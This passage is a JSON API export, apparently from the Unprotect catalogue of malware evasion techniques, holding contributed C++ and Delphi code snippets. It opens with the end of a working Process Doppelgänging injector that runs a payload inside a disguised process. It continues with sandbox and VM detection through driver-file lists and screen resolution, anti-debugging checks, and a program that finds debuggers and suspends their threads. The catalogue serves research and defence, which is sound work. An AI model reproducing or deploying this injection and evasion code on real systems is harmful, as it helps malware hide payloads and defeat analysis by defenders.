= NtReadVirtualMemory(hProcess, pbi.PebBaseAddress, &temp, 0x1000, &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtReadVirtualMemory failed\");\r\n            break;\r\n        }\r\n\r\n        EntryPoint = (ULONG_PTR)RtlImageNtHeader(Buffer)->OptionalHeader.AddressOfEntryPoint;\r\n        EntryPoint += (ULONG_PTR)((PPEB)temp)->ImageBaseAddress;\r\n\r\n        //\r\n        // Create process parameters block.\r\n        //\r\n        //RtlInitUnicodeString(&ustr, L\"C:\\\\windows\\\\system32\\\\svchost.exe\");\r\n        RtlInitUnicodeString(&ustr, lpTargetApp);\r\n        status = RtlCreateProcessParametersEx(&ProcessParameters,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            &ustr,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            NULL,\r\n            RTL_USER_PROC_PARAMS_NORMALIZED);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"RtlCreateProcessParametersEx failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Allocate memory in target process and write process parameters block.\r\n        //\r\n        sz = ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength;\r\n        MemoryPtr = ProcessParameters;\r\n\r\n        status = NtAllocateVirtualMemory(hProcess,\r\n            &MemoryPtr,\r\n            0,\r\n            &sz,\r\n            MEM_RESERVE | MEM_COMMIT,\r\n            PAGE_READWRITE);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtAllocateVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        sz = 0;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            ProcessParameters,\r\n            ProcessParameters,\r\n            ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength,\r\n            &sz);\r\n\r\n        if (!NT_SUCCESS(status)) {\r\n            
OutputDebugString(L\"NtWriteVirtualMemory(ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Update PEB->ProcessParameters pointer to newly allocated block.\r\n        //\r\n        Peb = pbi.PebBaseAddress;\r\n        status = NtWriteVirtualMemory(hProcess,\r\n            &Peb->ProcessParameters,\r\n            &ProcessParameters,\r\n            sizeof(PVOID),\r\n            &sz);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtWriteVirtualMemory(Peb->ProcessParameters) failed\");\r\n            break;\r\n        }\r\n\r\n        //\r\n        // Create primary thread.\r\n        //\r\n        hThread = NULL;\r\n        status = NtCreateThreadEx(&hThread,\r\n            THREAD_ALL_ACCESS,\r\n            NULL,\r\n            hProcess,\r\n            (LPTHREAD_START_ROUTINE)EntryPoint,\r\n            NULL,\r\n            FALSE,\r\n            0,\r\n            0,\r\n            0,\r\n            NULL);\r\n        if (!NT_SUCCESS(status)) {\r\n            OutputDebugString(L\"NtCreateThreadEx(EntryPoint) failed\");\r\n            break;\r\n        }\r\n\r\n    } while (bCond);\r\n\r\n    if (hTransaction)\r\n        NtClose(hTransaction);\r\n    if (hSection)\r\n        NtClose(hSection);\r\n    if (hProcess)\r\n        NtClose(hProcess);\r\n    if (hThread)\r\n        NtClose(hThread);\r\n    if (hTransactedFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hTransactedFile);\r\n    if (hFile != INVALID_HANDLE_VALUE)\r\n        CloseHandle(hFile);\r\n    if (Buffer != NULL) {\r\n        sz = 0;\r\n        NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &sz, MEM_RELEASE);\r\n    }\r\n    if (ProcessParameters) {\r\n        RtlDestroyProcessParameters(ProcessParameters);\r\n    }\r\n}\r\n\r\nvoid main()\r\n{\r\n    ProcessDoppelgänging(L\"C:\\\\test\\\\target.exe\", L\"C:\\\\test\\\\payload.exe\");\r\n    ExitProcess(0);\r\n}"
        },
        {
            "id": 14,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 6,
                "username": "Unprotect",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/hashtag/unprotectproject",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/58/?format=api",
            "description": "",
            "plain_code": "#define WIN32_LEAN_AND_MEAN\r\n#include <stdio.h>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <windows.h>\r\n#include \"defs.h\"\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"psapi.lib\")\r\n\r\n\r\nvoid QueryProcessHeapMethod(void)\r\n{\r\n    PDEBUG_BUFFER buffer;\r\n    buffer = RtlCreateQueryDebugBuffer(0,FALSE);\r\n    RtlQueryProcessHeapInformation(buffer);\r\n\r\n    if (buffer->RemoteSectionBase == (PVOID) 0x50000062){\r\n        MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    else {\r\n        MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    if (buffer->EventPairHandle == (PVOID) 0x00002b98) {\r\n        MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n    }\r\n    else {\r\n        MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n        printf(\"EventPairHandle= %x\",(int)buffer->EventPairHandle);\r\n    }\r\n}\r\nint main()\r\n{\r\n    QueryProcessHeapMethod();\r\n    return (EXIT_SUCCESS);\r\n}"
        },
        {
            "id": 15,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/35/?format=api",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nint WINAPI WinMain ( HINSTANCE, HINSTANCE, LPSTR, int )\r\n{\r\n  char  ComputerName [MAX_COMPUTERNAME_LENGTH + 1];\r\n  DWORD cbComputerName = sizeof ( ComputerName );\r\n\r\n  if ( GetComputerName ( ComputerName, &cbComputerName ))\r\n     { \r\n         MessageBox ( NULL, ComputerName, \"Computer Name:\", MB_OK | MB_ICONINFORMATION ); \r\n     } \r\n}"
        },
        {
            "id": 12,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/31/?format=api",
            "description": "",
            "plain_code": "#include \"wtypes.h\"\r\n#include <iostream>\r\nusing namespace std;\r\n\r\n/*\r\n1024x768 can be used for automated Sandbox\r\n800x600 can be used for automated Sandbox\r\n640x480 can be used for automated Sandbox\r\n1024x697\r\n1280x800\r\n1280x960\r\n1680x1050\r\n1916x1066\r\n*/\r\n\r\nvoid GetResolution(int& horiz, int& verti)\r\n{\r\n   RECT desktop;\r\n   const HWND hDesktop = GetDesktopWindow();\r\n   GetWindowRect(hDesktop, &desktop);\r\n   horiz = desktop.right;\r\n   verti = desktop.bottom;\r\n}\r\n\r\nint main()\r\n{\r\n   int horiz = 0;\r\n   int verti = 0;\r\n   GetResolution(horiz, verti);\r\n\r\n   if(horiz < 1024)\r\n   {\r\n      cout << \"[!] Looks like you run in a sandbox!\"<< '\\n';\r\n   }\r\n\r\n   cout << \"[+] Screen resolution: \"<< horiz << \"x\" << verti << '\\n';\r\n   return 0;\r\n}"
        },
        {
            "id": 10,
            "language": {
                "id": 2,
                "label": "C++",
                "code_class": "cpp"
            },
            "user": {
                "id": 5,
                "username": "fr0gger",
                "email": "thomas.roccia@securitybreak.io",
                "linkedin": "https://www.linkedin.com/in/thomas-roccia",
                "twitter": "https://twitter.com/fr0gger_",
                "website": "https://securitybreak.io",
                "github": "https://github.com/fr0gger"
            },
            "technique": "https://unprotect.it/api/techniques/11/?format=api",
            "description": "",
            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\n\r\nBOOL FileExists(TCHAR* szPath)\r\n{\r\n\tDWORD dwAttrib = GetFileAttributes(szPath);\r\n\treturn (dwAttrib != INVALID_FILE_ATTRIBUTES) && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY);\r\n}\r\n\r\n// Check if file related to sandbox exist\r\nint CheckFile()\r\n{\r\n    bool hAppend;\r\n    LPSTR fname[] = {\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\agent.pyw\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmmouse.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmhgfs.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxMouse.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxGuest.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxSF.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxVideo.sys\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxdisp.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxhook.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxmrxnp.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxogl.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglarrayspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglcrutil.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglerrorspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglfeedbackspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpackspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpassthroughspu.dll\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxservice.exe\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\vboxtray.exe\",\r\n                     \"C:\\\\WINDOWS\\\\system32\\\\VBoxControl.exe\",\r\n                     
// ADD YOUR FILE HERE!\r\n                    };\r\n\r\n    for (int i = 0; i < (sizeof(fname) / sizeof(LPSTR)); i++)\r\n    {\r\n\r\n        if (FileExists(fname[i]))\r\n            cout << \" [+] File exist: \" << (fname[i]) << endl;\r\n\t\telse\r\n            cout << \" [-] File doesn't exist: \" << (fname[i]) << endl;\r\n\r\n    }\r\n\r\n    return 0;\r\n}\r\n\r\n\r\nint main()\r\n{\r\n    CheckFile();\r\n    return 0;\r\n}"
        },
        {
            "id": 11,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/109/?format=api",
            "description": "You can compile this unit as a classic Delphi Console Application. Feel free to edit both `LFindWindowSignatures` and `LProcessNameSignatures` to support more debuggers.",
            "plain_code": "program SuspendThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  WinAPI.Windows, System.SysUtils, Generics.Collections, tlHelp32, Classes;\r\n\r\ntype\r\n  TProcessItem = class\r\n  private\r\n    FName      : String;\r\n    FProcessId : Cardinal;\r\n    FThreads   : TList<Cardinal>;\r\n\r\n    {@M}\r\n    procedure EnumThreads();\r\n  public\r\n    {@C}\r\n    constructor Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\n    destructor Destroy(); override;\r\n\r\n    {@G}\r\n    property Name      : String          read FName;\r\n    property ProcessId : Cardinal        read FProcessId;\r\n    property Threads   : TList<Cardinal> read FThreads;\r\n  end;\r\n\r\n  TEnumProcess = class\r\n  private\r\n    FItems : TObjectList<TProcessItem>;\r\n  public\r\n    {@C}\r\n    constructor Create();\r\n    destructor Destroy(); override;\r\n\r\n    {@M}\r\n    function Refresh() : Cardinal;\r\n    procedure Clear();\r\n\r\n    function Get(AProcessId : Cardinal) : TProcessItem; overload;\r\n    function Get(AName : String) : TProcessItem; overload;\r\n\r\n    {@G}\r\n    property Items : TObjectList<TProcessItem> read FItems;\r\n  end;\r\n\r\n{\r\n  Import API's From Kernel32\r\n}\r\nconst THREAD_SUSPEND_RESUME = $00000002;\r\n\r\nfunction OpenThread(\r\n                      dwDesiredAccess: DWORD;\r\n                      bInheritHandle: BOOL;\r\n                      dwThreadId: DWORD\r\n          ) : THandle; stdcall; external kernel32 name 'OpenThread';\r\n\r\n{\r\n  Global Vars\r\n}\r\nvar LFindWindowSignatures  : TDictionary<String, String>;\r\n    LProcessNameSignatures : TStringList;\r\n    LProcesses             : TEnumProcess;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Process Item (Process Name / Process Id / Process Main Thread 
Id)\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TProcessItem.Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\nbegin\r\n  FName      := AName;\r\n  FProcessId := AProcessId;\r\n\r\n  FThreads := TList<Cardinal>.Create();\r\n\r\n  if AEnumThreads then\r\n    self.EnumThreads();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TProcessItem.Destroy();\r\nbegin\r\n  if Assigned(FThreads) then\r\n    FreeAndNil(FThreads);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Threads of process object\r\n-------------------------------------------------------------------------------}\r\nprocedure TProcessItem.EnumThreads();\r\nvar ASnap        : THandle;\r\n    AThreadEntry : TThreadEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AThreadEntry, SizeOf(TThreadEntry32));\r\n\r\n      AThreadEntry.dwSize := SizeOf(TThreadEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    begin\r\n      if (AThreadEntry.th32OwnerProcessID <> FProcessId) then\r\n        Exit();\r\n      ///\r\n\r\n      FThreads.Add(AThreadEntry.th32ThreadID);\r\n    end;\r\nbegin\r\n  if NOT Assigned(FThreads) then\r\n    Exit();\r\n  ///\r\n\r\n  FThreads.Clear();\r\n  ///\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Thread32First(ASnap, AThreadEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n 
   while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Thread32Next(ASnap, AThreadEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Enumerate Process Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TEnumProcess.Create();\r\nbegin\r\n  FItems := TObjectList<TProcessItem>.Create();\r\n  FItems.OwnsObjects := True;\r\n\r\n  ///\r\n  self.Refresh();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TEnumProcess.Destroy();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FreeAndNil(FItems);\r\n\r\n  ///\r\n  inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Enumerate Running Process.\r\n  @Return: Process Count\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Refresh() : Cardinal;\r\nvar ASnap         : THandle;\r\n    AProcessEntry : TProcessEntry32;\r\n\r\n    procedure InitializeItem();\r\n    begin\r\n      ZeroMemory(@AProcessEntry, SizeOf(TProcessEntry32));\r\n\r\n      AProcessEntry.dwSize := SizeOf(TProcessEntry32);\r\n    end;\r\n\r\n    procedure AppendItem();\r\n    var AItem : TProcessItem;\r\n    begin\r\n      AItem := TProcessItem.Create(\r\n                                    AProcessEntry.szExeFile,\r\n                                    AProcessEntry.th32ProcessID,\r\n                                    True {Enum Threads: Default}\r\n      
);\r\n\r\n      FItems.Add(AItem);\r\n    end;\r\n\r\nbegin\r\n  result := 0;\r\n  ///\r\n\r\n  if NOT Assigned(FItems) then\r\n    Exit();\r\n  ///\r\n\r\n  self.Clear();\r\n\r\n  ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n  if (ASnap = INVALID_HANDLE_VALUE) then\r\n    Exit();\r\n  try\r\n    InitializeItem();\r\n\r\n    if NOT Process32First(ASnap, AProcessEntry) then\r\n      Exit();\r\n\r\n    AppendItem();\r\n\r\n    while True do begin\r\n      InitializeItem();\r\n\r\n      if NOT Process32Next(ASnap, AProcessEntry) then\r\n        break;\r\n\r\n      AppendItem();\r\n    end;\r\n  finally\r\n    CloseHandle(ASnap);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Clear Items (Process Objects)\r\n-------------------------------------------------------------------------------}\r\nprocedure TEnumProcess.Clear();\r\nbegin\r\n  if Assigned(FItems) then\r\n    FItems.Clear;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Get Process Item by Process Id or Name\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Get(AProcessId : Cardinal) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.ProcessId = AProcessId) then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\nfunction TEnumProcess.Get(AName : String) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n    I     : Integer;\r\nbegin\r\n  result := nil;\r\n  ///\r\n\r\n  for I := 0 to self.Items.count -1 do begin\r\n    AItem := self.Items.Items[I];\r\n    if NOT Assigned(AItem) then\r\n      continue;\r\n    ///\r\n\r\n    if (AItem.Name.ToLower = AName.ToLower) 
then begin\r\n      result := AItem;\r\n\r\n      Break;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n  Suspend Threads of target process.\r\n-------------------------------------------------------------------------------}\r\nfunction SuspendThreadsByProcessId(AProcessId : Cardinal) : Boolean;\r\nvar AItem     : TProcessItem;\r\n    AThreadId : Cardinal;\r\n    I         : Integer;\r\n    AThread   : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  if NOT Assigned(LProcesses) then\r\n    Exit();\r\n\r\n  AItem := LProcesses.Get(AProcessId);\r\n  if NOT Assigned(AItem) then\r\n    Exit();\r\n  ///\r\n\r\n  if (AItem.Threads.count = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  for I := 0 to AItem.Threads.Count -1 do begin\r\n    AThreadId := AItem.Threads.Items[I];\r\n    ///\r\n\r\n    AThread := OpenThread(THREAD_SUSPEND_RESUME, False, AThreadId);\r\n    if (AThread = 0) then\r\n      continue;\r\n    try\r\n      WriteLn(Format('Suspending: %s(%d), Thread Id: %d...', [\r\n                                                                    AItem.Name,\r\n                                                                    AItem.ProcessId,\r\n                                                                    AThreadId\r\n      ]));\r\n\r\n      WinAPI.Windows.SuspendThread(AThread);\r\n\r\n      result := True;\r\n    finally\r\n      CloseHandle(AThread);\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  FindWindow API Example\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindWindow() : Boolean;\r\nvar AHandle     : THandle;\r\n    AProcessId  : Cardinal;\r\n    AClassName  : 
String;\r\n    AWindowName : String;\r\n    pClassName  : Pointer;\r\n    pWindowName : Pointer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for AClassName in LFindWindowSignatures.Keys do begin\r\n    if NOT LFindWindowSignatures.TryGetValue(AClassName, AWindowName) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AClassName.isEmpty then\r\n      pClassName := PWideChar(AClassName);\r\n\r\n    if NOT AWindowName.isEmpty then\r\n      pWindowName := PWideChar(AWindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n      if (AProcessId > 0) then\r\n        SuspendThreadsByProcessId(AProcessId);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Process Example (Uses the TEnumProcess Class) - See above\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindProcess() : Boolean;\r\nvar AItem : TProcessItem;\r\n    AName : String;\r\n    I     : Integer;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for I := 0 to LProcessNameSignatures.count -1 do begin\r\n    AName := LProcessNameSignatures.Strings[I];\r\n\r\n    AItem := LProcesses.Get(AName);\r\n    if (NOT Assigned(AItem)) then\r\n      continue;\r\n    ///\r\n\r\n    SuspendThreadsByProcessId(AItem.ProcessId);\r\n\r\n    ///\r\n    result := True;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n  try\r\n    LProcesses := TEnumProcess.Create();\r\n    try\r\n      // FindWindow API\r\n      LFindWindowSignatures := TDictionary<String, String>.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n   
       @Param1: ClassName  (Empty = NULL)\r\n          @Param2: WindowName (Empty = NULL)\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LFindWindowSignatures.Add('OLLYDBG', '');\r\n        {\r\n          ...\r\n        }\r\n        method_FindWindow();\r\n      finally\r\n        if Assigned(LFindWindowSignatures) then\r\n          FreeAndNil(LFindWindowSignatures);\r\n      end;\r\n\r\n      // Find by Process Name\r\n      LProcessNameSignatures := TStringList.Create();\r\n      try\r\n        {\r\n          ...\r\n\r\n          @Param1: Process Name (Example: OllyDbg.exe) - Case Insensitive\r\n\r\n          Add your own signatures bellow...\r\n        }\r\n        LProcessNameSignatures.Add('ImmunityDebugger.exe');\r\n        {\r\n          ...\r\n        }\r\n        method_FindProcess();\r\n      finally\r\n        if Assigned(LProcessNameSignatures) then\r\n          FreeAndNil(LProcessNameSignatures);\r\n      end;\r\n    finally\r\n      if Assigned(LProcesses) then\r\n        FreeAndNil(LProcesses);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 9,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/67/?format=api",
            "description": "You can build this snippet as a classic Delphi Console Application and add your own signatures for detecting debuggers and related tools.",
            "plain_code": "program FindWindowAPI;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n  System.SysUtils, WinAPI.Windows, Generics.Collections, psAPI;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  TFindWindowSignature Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\ntype\r\n  TFindWindowSignature = class\r\n  private\r\n    FDescription : String;\r\n    FClassName   : String;\r\n    FWindowName  : String;\r\n  public\r\n    {@C}\r\n    constructor Create(ADescription, AClassName, AWindowName : String);\r\n\r\n    {@G}\r\n    property Description : String read FDescription;\r\n    property ClassName   : String read FClassName;\r\n    property WindowName  : String read FWindowName;\r\n  end;\r\n\r\n{-------------------------------------------------------------------------------\r\n  ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TFindWindowSignature.Create(ADescription, AClassName, AWindowName : String);\r\nbegin\r\n  FDescription := ADescription;\r\n  FClassName   := AClassName;\r\n  FWindowName  := AWindowName;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n  Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\nvar LFindWindowSignatures  : TObjectList<TFindWindowSignature>;\r\n    LEnumWindowsSignatures : TDictionary<String, String>;\r\n\r\n{-------------------------------------------------------------------------------\r\n  When a Window handle is found it will output to console several information\r\n  about spotted process.\r\n-------------------------------------------------------------------------------}\r\nprocedure Found(ADescription : String; AHandle : THandle);\r\nconst CRLF = #13#10;\r\n\r\nvar AStdout_TXT    : String;\r\n    AProcessId     : Cardinal;\r\n    AProcessHandle : THandle;\r\n    ARet    
       : DWORD;\r\n    pImagePath     : PWideChar;\r\nbegin\r\n  try\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n      AStdout_TXT := AStdout_TXT + ADescription + CRLF;\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n\r\n      AStdout_TXT := AStdout_TXT + Format('Handle: %d%s', [AHandle, CRLF]);\r\n\r\n      GetWindowThreadProcessId(AHandle, @AProcessId);\r\n\r\n      if (AProcessId > 0) then begin\r\n        AProcessHandle := OpenProcess(\r\n                                        (PROCESS_QUERY_INFORMATION or PROCESS_VM_READ),\r\n                                        False,\r\n                                        AProcessId\r\n        );\r\n\r\n        if (AProcessHandle > 0) then begin\r\n          AStdout_TXT := AStdout_TXT + Format('Process Id: %d%s', [AProcessId, CRLF]);\r\n\r\n          pImagePath := nil;\r\n          try\r\n              GetMem(pImagePath, (MAX_PATH * 2));\r\n              ARet := GetModuleFileNameExW(AProcessHandle, 0, pImagePath, (MAX_PATH * 2));\r\n              if (ARet > 0) then begin\r\n                AStdout_TXT := AStdout_TXT + Format('Process Name: %s%s', [ExtractFileName(String(pImagePath)), CRLF]);\r\n                AStdout_TXT := AStdout_TXT + Format('Image Path: %s%s', [ExtractFilePath(String(pImagePath)), CRLF]);\r\n              end;\r\n          finally\r\n            if Assigned(pImagePath) and (ARet > 0) then\r\n              FreeMem(pImagePath, ARet);\r\n          end;\r\n        end;\r\n      end;\r\n\r\n      AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF + CRLF;\r\n\r\n      ///\r\n  finally\r\n    WriteLn(AStdout_TXT);\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Debuggers by Window Name or Class Name using FindWindow API\r\n-------------------------------------------------------------------------------}\r\nfunction Locate_FindWindow() : Boolean;\r\nvar AFindWindowSignature : 
TFindWindowSignature;\r\n    i                    : Integer;\r\n    pClassName           : Pointer;\r\n    pWindowName          : Pointer;\r\n    AHandle              : THandle;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  for i := 0 to LFindWindowSignatures.Count -1 do begin\r\n    AFindWindowSignature := LFindWindowSignatures.Items[i];\r\n    if NOT Assigned(AFindWindowSignature) then\r\n      continue;\r\n    ///\r\n\r\n    pClassName  := nil;\r\n    pWindowName := nil;\r\n\r\n    if NOT AFindWindowSignature.ClassName.isEmpty then\r\n      pClassName := PWideChar(AFindWindowSignature.ClassName);\r\n\r\n    if NOT AFindWindowSignature.WIndowName.isEmpty then\r\n      pWindowName := PWideChar(AFindWindowSignature.WindowName);\r\n\r\n    AHandle := FindWindowW(pClassName, pWindowName);\r\n    if (AHandle > 0) then begin\r\n      Found(AFindWindowSignature.Description, AHandle);\r\n\r\n      ///\r\n      result := True;\r\n    end;\r\n  end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n  Find Debuggers by Window Name (via Window Name Pattern) using EnumWindows API\r\n-------------------------------------------------------------------------------}\r\nfunction EnumWindowProc(AHandle : THandle; AParam : LPARAM) : BOOL; stdcall;\r\nvar AMaxCount   : Integer;\r\n    AWindowName : String;\r\n    AOldLen     : Cardinal;\r\n    APattern    : String;\r\n    AKey        : String;\r\nbegin\r\n  result := True;\r\n  ///\r\n\r\n  if (AHandle = 0) then\r\n    Exit();\r\n  ///\r\n\r\n  AMaxCount := GetWindowTextLength(AHandle) + 1;\r\n  if (AMaxCount = 0) 